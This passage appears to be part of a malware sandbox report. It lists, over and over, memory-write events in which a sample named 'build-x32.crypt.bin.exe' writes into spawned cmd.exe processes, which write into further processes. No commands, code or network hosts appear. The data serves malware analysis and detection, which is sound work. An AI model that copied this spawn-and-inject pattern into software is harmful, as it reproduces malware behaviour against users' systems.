1124 wrote to memory of 1760 1124 build-x32.crypt.bin.exe 92 PID 1760 wrote to memory of 1592 1760 cmd.exe 94 PID 1760 wrote to memory of 1592 1760 cmd.exe 94 PID 1760 wrote to memory of 1592 1760 cmd.exe 94 PID 1760 wrote to memory of 1592 1760 cmd.exe 94 PID 1124 wrote to memory of 1664 1124 build-x32.crypt.bin.exe 95 PID 1124 wrote to memory of 1664 1124 build-x32.crypt.bin.exe 95 PID 1124 wrote to memory of 1664 1124 build-x32.crypt.bin.exe 95 PID 1124 wrote to memory of 1664 1124 build-x32.crypt.bin.exe 95 PID 1664 wrote to memory of 1656 1664 cmd.exe 97 PID 1664 wrote to memory of 1656 1664 cmd.exe 97 PID 1664 wrote to memory of 1656 1664 cmd.exe 97 PID 1664 wrote to memory of 1656 1664 cmd.exe 97 PID 1124 wrote to memory of 1960 1124 build-x32.crypt.bin.exe 98 PID 1124 wrote to memory of 1960 1124 build-x32.crypt.bin.exe 98 PID 1124 wrote to memory of 1960 1124 build-x32.crypt.bin.exe 98 PID 1124 wrote to memory of 1960 1124 build-x32.crypt.bin.exe 98 PID 1960 wrote to memory of 1968 1960 cmd.exe 100 PID 1960 wrote to memory of 1968 1960 cmd.exe 100 PID 1960 wrote to memory of 1968 1960 cmd.exe 100 PID 1960 wrote to memory of 1968 1960 cmd.exe 100 PID 1124 wrote to memory of 284 1124 build-x32.crypt.bin.exe 101 PID 1124 wrote to memory of 284 1124 build-x32.crypt.bin.exe 101 PID 1124 wrote to memory of 284 1124 build-x32.crypt.bin.exe 101 PID 1124 wrote to memory of 284 1124 build-x32.crypt.bin.exe 101 PID 284 wrote to memory of 2040 284 cmd.exe 103 PID 284 wrote to memory of 2040 284 cmd.exe 103 PID 284 wrote to memory of 2040 284 cmd.exe 103 PID 284 wrote to memory of 2040 284 cmd.exe 103 PID 1124 wrote to memory of 2008 1124 build-x32.crypt.bin.exe 104 PID 1124 wrote to memory of 2008 1124 build-x32.crypt.bin.exe 104 PID 1124 wrote to memory of 2008 1124 build-x32.crypt.bin.exe 104 PID 1124 wrote to memory of 2008 1124 build-x32.crypt.bin.exe 104 PID 2008 wrote to memory of 2024 2008 cmd.exe 106 PID 2008 wrote to memory of 2024 2008 cmd.exe 106 PID 2008 wrote to memory of 2024 2008 cmd.exe 106 PID 2008 wrote to memory of 2024 2008 cmd.exe 106 PID 1124 wrote to memory of 1580 1124 build-x32.crypt.bin.exe 107 PID 1124 wrote to memory of 1580 1124 build-x32.crypt.bin.exe 107 PID 1124 wrote to memory of 1580 1124 build-x32.crypt.bin.exe 107 PID 1124 wrote to memory of 1580 1124 build-x32.crypt.bin.exe 107 PID 1580 wrote to memory of 292 1580 cmd.exe 109 PID 1580 wrote to memory of 292 1580 cmd.exe 109 PID 1580 wrote to memory of 292 1580 cmd.exe 109 PID 1580 wrote to memory of 292 1580 cmd.exe 109 PID 1124 wrote to memory of 1548 1124 build-x32.crypt.bin.exe 110 PID 1124 wrote to memory of 1548 1124 build-x32.crypt.bin.exe 110 PID 1124 wrote to memory of 1548 1124 build-x32.crypt.bin.exe 110 PID 1124 wrote to memory of 1548 1124 build-x32.crypt.bin.exe 110 PID 1548 wrote to memory of 1088 1548 cmd.exe 112 PID 1548 wrote to memory of 1088 1548 cmd.exe 112 PID 1548 wrote to memory of 1088 1548 cmd.exe 112 PID 1548 wrote to memory of 1088 1548 cmd.exe 112 PID 1124 wrote to memory of 1828 1124 build-x32.crypt.bin.exe 113 PID 1124 wrote to memory of 1828 1124 build-x32.crypt.bin.exe 113 PID 1124 wrote to memory of 1828 1124 build-x32.crypt.bin.exe 113 PID 1124 wrote to memory of 1828 1124 build-x32.crypt.bin.exe 113 PID 1828 wrote to memory of 1512 1828 cmd.exe 115 PID 1828 wrote to memory of 1512 1828 cmd.exe 115 PID 1828 wrote to memory of 1512 1828 cmd.exe 115 PID 1828 wrote to memory of 1512 1828 cmd.exe 115 PID 1124 wrote to memory of 1764 1124 build-x32.crypt.bin.exe 116 PID 1124 wrote to memory of 1764 1124 build-x32.crypt.bin.exe 116 PID 1124 wrote to memory of 1764 1124 build-x32.crypt.bin.exe 116 PID 1124 wrote to memory of 1764 1124 build-x32.crypt.bin.exe 116 PID 1764 wrote to memory of 1856 1764 cmd.exe 118 PID 1764 wrote to memory of 1856 1764 cmd.exe 118 PID 1764 wrote to memory of 1856 1764 cmd.exe 118 PID 1764 wrote to memory of 1856 1764 cmd.exe 118 PID 1124 wrote to memory of 1592 1124 build-x32.crypt.bin.exe 119 PID 1124 wrote to memory of 1592 1124 build-x32.crypt.bin.exe 119 PID 1124 wrote to memory of 1592 1124 build-x32.crypt.bin.exe 119 PID 1124 wrote to memory of 1592 1124 build-x32.crypt.bin.exe 119 PID 1592 wrote to memory of 1604 1592 cmd.exe 121 PID 1592 wrote to memory of 1604 1592 cmd.exe 121 PID 1592 wrote to memory of 1604 1592 cmd.exe 121 PID 1592 wrote to memory of 1604 1592 cmd.exe 121 PID 1124 wrote to memory of 1656 1124 build-x32.crypt.bin.exe 122 PID 1124 wrote to memory of 1656 1124 build-x32.crypt.bin.exe 122 PID 1124 wrote to memory of 1656 1124 build-x32.crypt.bin.exe 122 PID 1124 wrote to memory of 1656 1124 build-x32.crypt.bin.exe 122 PID 1656 wrote to memory of 1608 1656 cmd.exe 124 PID 1656 wrote to memory of 1608 1656 cmd.exe 124 PID 1656 wrote to memory of 1608 1656 cmd.exe 124 PID 1656 wrote to memory of 1608 1656 cmd.exe 124 PID 1124 wrote to memory of 1968 1124 build-x32.crypt.bin.exe 125 PID 1124 wrote to memory of 1968 1124 build-x32.crypt.bin.exe 125 PID 1124 wrote to memory of 1968 1124 build-x32.crypt.bin.exe 125 PID 1124 wrote to memory of 1968 1124 build-x32.crypt.bin.exe 125 PID 1968 wrote to memory of 1940 1968 cmd.exe 127 PID 1968 wrote to memory of 1940 1968 cmd.exe 127 PID 1968 wrote to memory of 1940 1968 cmd.exe 127 PID 1968 wrote to memory of 1940 1968 cmd.exe 127 PID 1124 wrote to memory of 2040 1124 build-x32.crypt.bin.exe 128 PID 1124 wrote to memory of 2040 1124 build-x32.crypt.bin.exe 128 PID 1124 wrote to memory of 2040 1124 build-x32.crypt.bin.exe 128 PID 1124 wrote to memory of 2040 1124 build-x32.crypt.bin.exe 128 PID 2040 wrote to memory of 1028 2040 cmd.exe 130 PID 2040 wrote to memory of 1028 2040 cmd.exe 130 PID 2040 wrote to memory of 1028 2040 cmd.exe 130 PID 2040 wrote to memory of 1028 2040 cmd.exe 130 PID 1124 wrote to memory of 2024 1124 build-x32.crypt.bin.exe 131 PID 1124 wrote to memory of 2024 1124 build-x32.crypt.bin.exe 131 PID 1124 wrote to memory of 2024 1124 build-x32.crypt.bin.exe 131 PID 1124 wrote to memory of 2024 1124 build-x32.crypt.bin.exe 131 PID 2024 wrote to memory of 1212 2024 cmd.exe 133 PID 2024 wrote to memory of 1212 2024 cmd.exe 133 PID 2024 wrote to memory of 1212 2024 cmd.exe 133 PID 2024 wrote to memory of 1212 2024 cmd.exe 133 PID 1124 wrote to memory of 292 1124 build-x32.crypt.bin.exe 134 PID 1124 wrote to memory of 292 1124 build-x32.crypt.bin.exe 134 PID 1124 wrote to memory of 292 1124 build-x32.crypt.bin.exe 134 PID 1124 wrote to memory of 292 1124 build-x32.crypt.bin.exe 134 PID 292 wrote to memory of 1616 292 cmd.exe 136 PID 292 wrote to memory of 1616 292 cmd.exe 136 PID 292 wrote to memory of 1616 292 cmd.exe 136 PID 292 wrote to memory of 1616 292 cmd.exe 136 PID 1124 wrote to memory of 1088 1124 build-x32.crypt.bin.exe 137 PID 1124 wrote to memory of 1088 1124 build-x32.crypt.bin.exe 137 PID 1124 wrote to memory of 1088 1124 build-x32.crypt.bin.exe 137 PID 1124 wrote to memory of 1088 1124 build-x32.crypt.bin.exe 137 PID 1088 wrote to memory of 1544 1088 cmd.exe 139 PID 1088 wrote to memory of 1544 1088 cmd.exe 139 PID 1088 wrote to memory of 1544 1088 cmd.exe 139 PID 1088 wrote to memory of 1544 1088 cmd.exe 139 PID 1124 wrote to memory of 1512 1124 build-x32.crypt.bin.exe 140 PID 1124 wrote to memory of 1512 1124 build-x32.crypt.bin.exe 140 PID 1124 wrote to memory of 1512 1124 build-x32.crypt.bin.exe 140 PID 1124 wrote to memory of 1512 1124 build-x32.crypt.bin.exe 140 PID 1512 wrote to memory of 1396 1512 cmd.exe 142 PID 1512 wrote to memory of 1396 1512 cmd.exe 142 PID 1512 wrote to memory of 1396 1512 cmd.exe 142 PID 1512 wrote to memory of 1396 1512 cmd.exe 142 PID 1124 wrote to memory of 1636 1124 build-x32.crypt.bin.exe 143 PID 1124 wrote to memory of 1636 1124 build-x32.crypt.bin.exe 143 PID 1124 wrote to memory of 1636 1124 build-x32.crypt.bin.exe 143 PID 1124 wrote to memory of 1636 1124 build-x32.crypt.bin.exe 143 PID 1636 wrote to memory of 1764 1636 cmd.exe 145 PID 1636 wrote to memory of 1764 1636 cmd.exe 145 PID 1636 wrote to memory of 1764 1636 cmd.exe 145 PID 1636 wrote to memory of 1764 1636 cmd.exe 145 PID 1124 wrote to memory of 1852 1124 build-x32.crypt.bin.exe 146 PID 1124 wrote to memory of 1852 1124 build-x32.crypt.bin.exe 146 PID 1124 wrote to memory of 1852 1124 build-x32.crypt.bin.exe 146 PID 1124 wrote to memory of 1852 1124 build-x32.crypt.bin.exe 146 PID 1852 wrote to memory of 1956 1852 cmd.exe 148 PID 1852 wrote to memory of 1956 1852 cmd.exe 148 PID 1852 wrote to memory of 1956 1852 cmd.exe 148 PID 1852 wrote to memory of 1956 1852 cmd.exe 148 PID 1124 wrote to memory of 1652 1124 build-x32.crypt.bin.exe 149 PID 1124 wrote to memory of 1652 1124 build-x32.crypt.bin.exe 149 PID 1124 wrote to memory of 1652 1124 build-x32.crypt.bin.exe 149 PID 1124 wrote to memory of 1652 1124 build-x32.crypt.bin.exe 149 PID 1652 wrote to memory of 1988 1652 cmd.exe 151 PID 1652 wrote to memory of 1988 1652 cmd.exe 151 PID 1652 wrote to memory of 1988 1652 cmd.exe 151 PID 1652 wrote to memory of 1988 1652 cmd.exe 151 PID 1124 wrote to memory of 1656 1124 build-x32.crypt.bin.exe 152 PID 1124 wrote to memory of 1656 1124 build-x32.crypt.bin.exe 152 PID 1124 wrote to memory of 1656 1124 build-x32.crypt.bin.exe 152 PID 1124 wrote to memory of 1656 1124 build-x32.crypt.bin.exe 152 PID 1656 wrote to memory of 1568 1656 cmd.exe 154 PID 1656 wrote to memory of 1568 1656 cmd.exe 154 PID 1656 wrote to memory of 1568 1656 cmd.exe 154 PID 1656 wrote to memory of 1568 1656 cmd.exe 154 PID 1124 wrote to memory of 1968 1124 build-x32.crypt.bin.exe 155 PID 1124 wrote to memory of 1968 1124 build-x32.crypt.bin.exe 155 PID 1124 wrote to memory of 1968 1124 build-x32.crypt.bin.exe 155 PID 1124 wrote to memory of 1968 1124 build-x32.crypt.bin.exe 155 PID 1968 wrote to memory of 1524 1968 cmd.exe 157 PID 1968 wrote to memory of 1524 1968 cmd.exe 157 PID 1968 wrote to memory of 1524 1968 cmd.exe 157 PID 1968 wrote to memory of 1524 1968 cmd.exe 157 PID 1124 wrote to memory of 1936 1124 build-x32.crypt.bin.exe 158 PID 1124 wrote to memory of 1936 1124 build-x32.crypt.bin.exe 158 PID 1124 wrote to memory of 1936 1124 build-x32.crypt.bin.exe 158 PID 1124 wrote to memory of 1936 1124 build-x32.crypt.bin.exe 158 PID 1936 wrote to memory of 1536 1936 cmd.exe 160 PID 1936 wrote to memory of 1536 1936 cmd.exe 160 PID 1936 wrote to memory of 1536 1936 cmd.exe 160 PID 1936 wrote to memory of 1536 1936 cmd.exe 160 PID 1124 wrote to memory of 2012 1124 build-x32.crypt.bin.exe 161 PID 1124 wrote to memory of 2012 1124 build-x32.crypt.bin.exe 161 PID 1124 wrote to memory of 2012 1124 build-x32.crypt.bin.exe 161 PID 1124 wrote to memory of 2012 1124 build-x32.crypt.bin.exe 161 PID 2012 wrote to memory of 656 2012 cmd.exe 163 PID 2012 wrote to memory of 656 2012 cmd.exe 163 PID 2012 wrote to memory of 656 2012 cmd.exe 163 PID 2012 wrote to memory of 656 2012 cmd.exe 163 PID 1124 wrote to memory of 1836 1124 build-x32.crypt.bin.exe 164 PID 1124 wrote to memory of 1836 1124 build-x32.crypt.bin.exe 164 PID 1124 wrote to memory of 1836 1124 build-x32.crypt.bin.exe 164 PID 1124 wrote to memory of 1836 1124 build-x32.crypt.bin.exe 164 PID 1836 wrote to memory of 1432 1836 cmd.exe 166 PID 1836 wrote to memory of 1432 1836 cmd.exe 166 PID 1836 wrote to memory of 1432 1836 cmd.exe 166 PID 1836 wrote to memory of 1432 1836 cmd.exe 166 PID 1124 wrote to memory of 1800 1124 build-x32.crypt.bin.exe 167 PID 1124 wrote to memory of 1800 1124 build-x32.crypt.bin.exe 167 PID 1124 wrote to memory of 1800 1124 build-x32.crypt.bin.exe 167 PID 1124 wrote to memory of 1800 1124 build-x32.crypt.bin.exe 167 PID 1800 wrote to memory of 1088 1800 cmd.exe 169 PID 1800 wrote to memory of 1088 1800 cmd.exe 169 PID 1800 wrote to memory of 1088 1800 cmd.exe 169 PID 1800 wrote to memory of 1088 1800 cmd.exe 169 PID 1124 wrote to memory of 1396 1124 build-x32.crypt.bin.exe 170 PID 1124 wrote to memory of 1396 1124 build-x32.crypt.bin.exe 170 PID 1124 wrote to memory of 1396 1124 build-x32.crypt.bin.exe 170 PID 1124 wrote to memory of 1396 1124 build-x32.crypt.bin.exe 170 PID 1396 wrote to memory of 1856 1396 cmd.exe 172 PID 1396 wrote to memory of 1856 1396 cmd.exe 172 PID 1396 wrote to memory of 1856 1396 cmd.exe 172 PID 1396 wrote to memory of 1856 1396 cmd.exe 172 PID 1124 wrote to memory of 1560 1124 build-x32.crypt.bin.exe 173 PID 1124 wrote to memory of 1560 1124 build-x32.crypt.bin.exe 173 PID 1124 wrote to memory of 1560 1124 build-x32.crypt.bin.exe 173 PID 1124 wrote to memory of 1560 1124 build-x32.crypt.bin.exe 173 PID 1560 wrote to memory of 1660 1560 cmd.exe 175 PID 1560 wrote to memory of 1660 1560 cmd.exe 175 PID 1560 wrote to memory of 1660 1560 cmd.exe 175 PID 1560 wrote to memory of 1660 1560 cmd.exe 175 PID 1124 wrote to memory of 1924 1124 build-x32.crypt.bin.exe 176 PID 1124 wrote to memory of 1924 1124 build-x32.crypt.bin.exe 176 PID 1124 wrote to memory of 1924 1124 build-x32.crypt.bin.exe 176 PID 1124 wrote to memory of 1924 1124 build-x32.crypt.bin.exe 176 PID 1924 wrote to memory of 2036 1924 cmd.exe 178 PID 1924 wrote to memory of 2036 1924 cmd.exe 178 PID 1924 wrote to memory of 2036 1924 cmd.exe 178 PID 1924 wrote to memory of 2036 1924 cmd.exe 178 PID 1124 wrote to memory of 884 1124 build-x32.crypt.bin.exe 179 PID 1124 wrote to memory of 884 1124 build-x32.crypt.bin.exe 179 PID 1124 wrote to memory of 884 1124 build-x32.crypt.bin.exe 179 PID 1124 wrote to memory of 884 1124 build-x32.crypt.bin.exe 179 PID 884 wrote to memory of 528 884 cmd.exe 181 PID 884 wrote to memory of 528 884 cmd.exe 181 PID 884 wrote to memory of 528 884 cmd.exe 181 PID 884 wrote to memory of 528 884 cmd.exe 181 PID 1124 wrote to memory of 1672 1124 build-x32.crypt.bin.exe 182 PID 1124 wrote to memory of 1672 1124 build-x32.crypt.bin.exe 182 PID 1124 wrote to memory of 1672 1124 build-x32.crypt.bin.exe 182 PID 1124 wrote to memory of 1672 1124 build-x32.crypt.bin.exe 182 PID 1672 wrote to memory of 1440 1672 cmd.exe 184 PID 1672 wrote to memory of 1440 1672 cmd.exe 184 PID 1672 wrote to memory of 1440 1672 cmd.exe 184 PID 1672 wrote to memory of 1440 1672 cmd.exe 184 PID 1124 wrote to memory of 2032 1124 build-x32.crypt.bin.exe 185 PID 1124 wrote to memory of 2032 1124 build-x32.crypt.bin.exe 185 PID 1124 wrote to memory of 2032 1124 build-x32.crypt.bin.exe 185 PID 1124 wrote to memory of 2032 1124 build-x32.crypt.bin.exe 185 PID 2032 wrote to memory of 1696 2032 cmd.exe 187 PID 2032 wrote to memory of 1696 2032 cmd.exe 187 PID 2032 wrote to memory of 1696 2032 cmd.exe 187 PID 2032 wrote to memory of 1696 2032 cmd.exe 187 PID 1124 wrote to memory of 2024 1124 build-x32.crypt.bin.exe 188 PID 1124 wrote to memory of 2024 1124 build-x32.crypt.bin.exe 188 PID 1124 wrote to memory of 2024 1124 build-x32.crypt.bin.exe 188 PID 1124 wrote to memory of 2024 1124 build-x32.crypt.bin.exe 188 PID 2024 wrote to memory of 1356 2024 cmd.exe 190 PID 2024 wrote to memory of 1356 2024 cmd.exe 190 PID 2024 wrote to memory of 1356 2024 cmd.exe 190 PID 2024 wrote to memory of 1356 2024 cmd.exe 190 PID 1124 wrote to memory of 2020 1124 build-x32.crypt.bin.exe 191 PID 1124 wrote to memory of 2020 1124 build-x32.crypt.bin.exe 191 PID 1124 wrote to memory of 2020 1124 build-x32.crypt.bin.exe 191 PID 1124 wrote to memory of 2020 1124 build-x32.crypt.bin.exe 191 PID 2020 wrote to memory of 1076 2020 cmd.exe 193 PID 2020 wrote to memory of 1076 2020 cmd.exe 193 PID 2020 wrote to memory of 1076 2020 cmd.exe 193 PID 2020 wrote to memory of 1076 2020 cmd.exe 193 PID 1124 wrote to memory of 1824 1124 build-x32.crypt.bin.exe 194 PID 1124 wrote to memory of 1824 1124 build-x32.crypt.bin.exe 194 PID 1124 wrote to memory of 1824 1124 build-x32.crypt.bin.exe 194 PID 1124 wrote to memory of 1824 1124 build-x32.crypt.bin.exe 194 PID 1824 wrote to memory of 1544 1824 cmd.exe 196 PID 1824 wrote to memory of 1544 1824 cmd.exe 196 PID 1824 wrote to memory of 1544 1824 cmd.exe 196 PID 1824 wrote to memory of 1544 1824 cmd.exe 196 PID 1124 wrote to memory of 1088 1124 build-x32.crypt.bin.exe 197 PID 1124 wrote to memory of 1088 1124 build-x32.crypt.bin.exe 197 PID 1124 wrote to memory of 1088 1124 build-x32.crypt.bin.exe 197 PID 1124 wrote to memory of 1088 1124 build-x32.crypt.bin.exe 197 PID 1088 wrote to memory of 1820 1088 cmd.exe 199 PID 1088 wrote to memory of 1820 1088 cmd.exe 199 PID 1088 wrote to memory of 1820 1088 cmd.exe 199 PID 1088 wrote to memory of 1820 1088 cmd.exe 199 PID 1124 wrote to memory of 1692 1124 build-x32.crypt.bin.exe 200 PID 1124 wrote to memory of 1692 1124 build-x32.crypt.bin.exe 200 PID 1124 wrote to memory of 1692 1124 build-x32.crypt.bin.exe 200 PID 1124 wrote to memory of 1692 1124 build-x32.crypt.bin.exe 200 PID 1692 wrote to memory of 1396 1692 cmd.exe 202 PID 1692 wrote to memory of 1396 1692 cmd.exe 202 PID 1692 wrote to memory of 1396 1692 cmd.exe 202 PID 1692 wrote to memory of 1396 1692 cmd.exe 202 PID 1124 wrote to memory of 1956 1124 build-x32.crypt.bin.exe 203 PID 1124 wrote to memory of 1956 1124 build-x32.crypt.bin.exe 203 PID 1124 wrote to memory of 1956 1124 build-x32.crypt.bin.exe 203 PID 1124 wrote to memory of 1956 1124 build-x32.crypt.bin.exe 203 PID 1956 wrote to memory of 1660 1956 cmd.exe 205 PID 1956 wrote to memory of 1660 1956 cmd.exe 205 PID 1956 wrote to memory of 1660 1956 cmd.exe 205 PID 1956 wrote to memory of 1660 1956 cmd.exe 205 PID 1124 wrote to memory of 1960 1124 build-x32.crypt.bin.exe 206 PID 1124 wrote to memory of 1960 1124 build-x32.crypt.bin.exe 206 PID 1124 wrote to memory of 1960 1124 build-x32.crypt.bin.exe 206 PID 1124 wrote to memory of 1960 1124 build-x32.crypt.bin.exe 206 PID 1960 wrote to memory of 2036 1960 cmd.exe 208 PID 1960 wrote to memory of 2036 1960 cmd.exe 208 PID 1960 wrote to memory of 2036 1960 cmd.exe 208 PID 1960 wrote to memory of 2036 1960 cmd.exe 208 PID 1124 wrote to memory of 1964 1124 build-x32.crypt.bin.exe 209 PID 1124 wrote to memory of 1964 1124 build-x32.crypt.bin.exe 209 PID 1124 wrote to memory of 1964 1124 build-x32.crypt.bin.exe 209 PID 1124 wrote to memory of 1964 1124 build-x32.crypt.bin.exe 209 PID 1964 wrote to memory of 528 1964 cmd.exe 211 PID 1964 wrote to memory of 528 1964 cmd.exe 211 PID 1964 wrote to memory of 528 1964 cmd.exe 211 PID 1964 wrote to memory of 528 1964 cmd.exe 211 PID 1124 wrote to memory of 2000 1124 build-x32.crypt.bin.exe 212 PID 1124 wrote to memory of 2000 1124 build-x32.crypt.bin.exe 212 PID 1124 wrote to memory of 2000 1124 build-x32.crypt.bin.exe 212 PID 1124 wrote to memory of 2000 1124 build-x32.crypt.bin.exe 212 PID 2000 wrote to memory of 1440 2000 cmd.exe 214 PID 2000 wrote to memory of 1440 2000 cmd.exe 214 PID 2000 wrote to memory of 1440 2000 cmd.exe 214 PID 2000 wrote to memory of 1440 2000 cmd.exe 214 PID 1124 wrote to memory of 1936 1124 build-x32.crypt.bin.exe 215 PID 1124 wrote to memory of 1936 1124 build-x32.crypt.bin.exe 215 PID 1124 wrote to memory of 1936 1124 build-x32.crypt.bin.exe 215 PID 1124 wrote to memory of 1936 1124 build-x32.crypt.bin.exe 215 PID 1936 wrote to memory of 1696 1936 cmd.exe 217 PID 1936 wrote to memory of 1696 1936 cmd.exe 217 PID 1936 wrote to memory of 1696 1936 cmd.exe 217 PID 1936 wrote to memory of 1696 1936 cmd.exe 217 PID 1124 wrote to memory of 2012 1124 build-x32.crypt.bin.exe 218 PID 1124 wrote to memory of 2012 1124 build-x32.crypt.bin.exe 218 PID 1124 wrote to memory of 2012 1124 build-x32.crypt.bin.exe 218 PID 1124 wrote to memory of 2012 1124 build-x32.crypt.bin.exe 218 PID 2012 wrote to memory of 1356 2012 cmd.exe 220 PID 2012 wrote to memory of 1356 2012 cmd.exe 220 PID 2012 wrote to memory of 1356 2012 cmd.exe 220 PID 2012 wrote to memory of 1356 2012 cmd.exe 220 PID 1124 wrote to memory of 1432 1124 build-x32.crypt.bin.exe 221 PID 1124 wrote to memory of 1432 1124 build-x32.crypt.bin.exe 221 PID 1124 wrote to memory of 1432 1124 build-x32.crypt.bin.exe 221 PID 1124 wrote to memory of 1432 1124 build-x32.crypt.bin.exe 221 PID 1432 wrote to memory of 1076 1432 cmd.exe 223 PID 1432 wrote to memory of 1076 1432 cmd.exe 223 PID 1432 wrote to memory of 1076 1432 cmd.exe 223 PID 1432 wrote to memory of 1076 1432 cmd.exe 223 PID 1124 wrote to memory of 1832 1124 build-x32.crypt.bin.exe 224 PID 1124 wrote to memory of 1832 1124 build-x32.crypt.bin.exe 224 PID 1124 wrote to memory of 1832 1124 build-x32.crypt.bin.exe 224 PID 1124 wrote to memory of 1832 1124 build-x32.crypt.bin.exe 224 PID 1832 wrote to memory of 1544 1832 cmd.exe 226 PID 1832 wrote to memory of 1544 1832 cmd.exe 226 PID 1832 wrote to memory of 1544 1832 cmd.exe 226 PID 1832 wrote to memory of 1544 1832 cmd.exe 226 PID 1124 wrote to memory of 1376 1124 build-x32.crypt.bin.exe 227 PID 1124 wrote to memory of 1376 1124 build-x32.crypt.bin.exe 227 PID 1124 wrote to memory of 1376 1124 build-x32.crypt.bin.exe 227 PID 1124 wrote to memory of 1376 1124 build-x32.crypt.bin.exe 227 PID 1376 wrote to memory of 1760 1376 cmd.exe 229 PID 1376 wrote to memory of 1760 1376 cmd.exe 229 PID 1376 wrote to memory of 1760 1376 cmd.exe 229 PID 1376 wrote to memory of 1760 1376 cmd.exe 229 PID 1124 wrote to memory of 1812 1124 build-x32.crypt.bin.exe 230 PID 1124 wrote to memory of 1812 1124 build-x32.crypt.bin.exe 230 PID 1124 wrote to memory of 1812 1124 build-x32.crypt.bin.exe 230 PID 1124 wrote to memory of 1812 1124 build-x32.crypt.bin.exe 230 PID 1812 wrote to memory of 1860 1812 cmd.exe 232 PID 1812 wrote to memory of 1860 1812 cmd.exe 232 PID 1812 wrote to memory of 1860 1812 cmd.exe 232 PID 1812 wrote to memory of 1860 1812 cmd.exe 232 PID 1124 wrote to memory of 1560 1124 build-x32.crypt.bin.exe 233 PID 1124 wrote to memory of 1560 1124 build-x32.crypt.bin.exe 233 PID 1124 wrote to memory of 1560 1124 build-x32.crypt.bin.exe 233 PID 1124 wrote to memory of 1560 1124 build-x32.crypt.bin.exe 233 PID 1560 wrote to memory of 1916 1560 cmd.exe 235 PID 1560 wrote to memory of 1916 1560 cmd.exe 235 PID 1560 wrote to memory of 1916 1560 cmd.exe 235 PID 1560 wrote to memory of 1916 1560 cmd.exe 235 PID 1124 wrote to memory of 1924 1124 build-x32.crypt.bin.exe 236 PID 1124 wrote to memory of 1924 1124 build-x32.crypt.bin.exe 236 PID 1124 wrote to memory of 1924 1124 build-x32.crypt.bin.exe 236 PID 1124 wrote to memory of 1924 1124 build-x32.crypt.bin.exe 236 PID 1924 wrote to memory of 1648 1924 cmd.exe 238 PID 1924 wrote to memory of 1648 1924 cmd.exe 238 PID 1924 wrote to memory of 1648 1924 cmd.exe 238 PID 1924 wrote to memory of 1648 1924 cmd.exe 238 PID 1124 wrote to memory of 884 1124 build-x32.crypt.bin.exe 239 PID 1124 wrote to memory of 884 1124 build-x32.crypt.bin.exe 239 PID 1124 wrote to memory of 884 1124 build-x32.crypt.bin.exe 239 PID 1124 wrote to memory of 884 1124 build-x32.crypt.bin.exe 239 PID 884 wrote to memory of 432 884 cmd.exe 241 PID 884 wrote to memory of 432 884 cmd.exe 241 PID 884 wrote to memory of 432 884 cmd.exe 241 PID 884 wrote to memory of 432 884 cmd.exe 241 PID 1124 wrote to memory of 1672 1124 build-x32.crypt.bin.exe 242 PID 1124 wrote to memory of 1672 1124 build-x32.crypt.bin.exe 242 PID 1124 wrote to memory of 1672 1124 build-x32.crypt.bin.exe 242 PID 1124 wrote to memory of 1672 1124 build-x32.crypt.bin.exe 242 PID 1672 wrote to memory of 520 1672 cmd.exe 244 PID 1672 wrote to memory of 520 1672 cmd.exe 244 PID 1672 wrote to memory of 520 1672 cmd.exe 244 PID 1672 wrote to memory of 520 1672 cmd.exe 244 PID 1124 wrote to memory of 2032 1124 build-x32.crypt.bin.exe 245 PID 1124 wrote to memory of 2032 1124 build-x32.crypt.bin.exe 245 PID 1124 wrote to memory of 2032 1124 build-x32.crypt.bin.exe 245 PID 1124 wrote to memory of 2032 1124 build-x32.crypt.bin.exe 245 PID 2032 wrote to memory of 2008 2032 cmd.exe 247 PID 2032 wrote to memory of 2008 2032 cmd.exe 247 PID 2032 wrote to memory of 2008 2032 cmd.exe 247 PID 2032 wrote to memory of 2008 2032 cmd.exe 247 PID 1124 wrote to memory of 1364 1124 build-x32.crypt.bin.exe 248 PID 1124 wrote to memory of 1364 1124 build-x32.crypt.bin.exe 248 PID 1124 wrote to memory of 1364 1124 build-x32.crypt.bin.exe 248 PID 1124 wrote to memory of 1364 1124 build-x32.crypt.bin.exe 248 PID 1364 wrote to memory of 1580 1364 cmd.exe 250 PID 1364 wrote to memory of 1580 1364 cmd.exe 250 PID 1364 wrote to memory of 1580 1364 cmd.exe 250 PID 1364 wrote to memory of 1580 1364 cmd.exe 250 PID 1124 wrote to memory of 1548 1124 build-x32.crypt.bin.exe 251 PID 1124 wrote to memory of 1548 1124 build-x32.crypt.bin.exe 251 PID 1124 wrote to memory of 1548 1124 build-x32.crypt.bin.exe 251 PID 1124 wrote to memory of 1548 1124 build-x32.crypt.bin.exe 251 PID 1548 wrote to memory of 1128 1548 cmd.exe 253 PID 1548 wrote to memory of 1128 1548 cmd.exe 253 PID 1548 wrote to memory of 1128 1548 cmd.exe 253 PID 1548 wrote to memory of 1128 1548 cmd.exe 253 PID 1124 wrote to memory of 1108 1124 build-x32.crypt.bin.exe 254 PID 1124 wrote to memory of 1108 1124 build-x32.crypt.bin.exe 254 PID 1124 wrote to memory of 1108 1124 build-x32.crypt.bin.exe 254 PID 1124 wrote to memory of 1108 1124 build-x32.crypt.bin.exe 254 PID 1108 wrote to memory of 1584 1108 cmd.exe 256 PID 1108 wrote to memory of 1584 1108 cmd.exe 256 PID 1108 wrote to memory of 1584 1108 cmd.exe 256 PID 1108 wrote to memory of 1584 1108 cmd.exe 256 PID 1124 wrote to memory of 1368 1124 build-x32.crypt.bin.exe 257 PID 1124 wrote to memory of 1368 1124 build-x32.crypt.bin.exe 257 PID 1124 wrote to memory of 1368 1124 build-x32.crypt.bin.exe 257 PID 1124 wrote to memory of 1368 1124 build-x32.crypt.bin.exe 257 PID 1368 wrote to memory of 316 1368 cmd.exe 259 PID 1368 wrote to memory of 316 1368 cmd.exe 259 PID 1368 wrote to memory of 316 1368 cmd.exe 259 PID 1368 wrote to memory of 316 1368 cmd.exe 259 PID 1124 wrote to memory of 1592 1124 build-x32.crypt.bin.exe 260 PID 1124 wrote to memory of 1592 1124 build-x32.crypt.bin.exe 260 PID 1124 wrote to memory of 1592 1124 build-x32.crypt.bin.exe 260 PID 1124 wrote to memory of 1592 1124 build-x32.crypt.bin.exe 260 PID 1592 wrote to memory of 1668 1592 cmd.exe 262 PID 1592 wrote to memory of 1668 1592 cmd.exe 262 PID 1592 wrote to memory of 1668 1592 cmd.exe 262 PID 1592 wrote to memory of 1668 1592 cmd.exe 262 PID 1124 wrote to memory of 2044 1124 build-x32.crypt.bin.exe 263 PID 1124 wrote to memory of 2044 1124 build-x32.crypt.bin.exe 263 PID 1124 wrote to memory of 2044 1124 build-x32.crypt.bin.exe 263 PID 1124 wrote to memory of 2044 1124 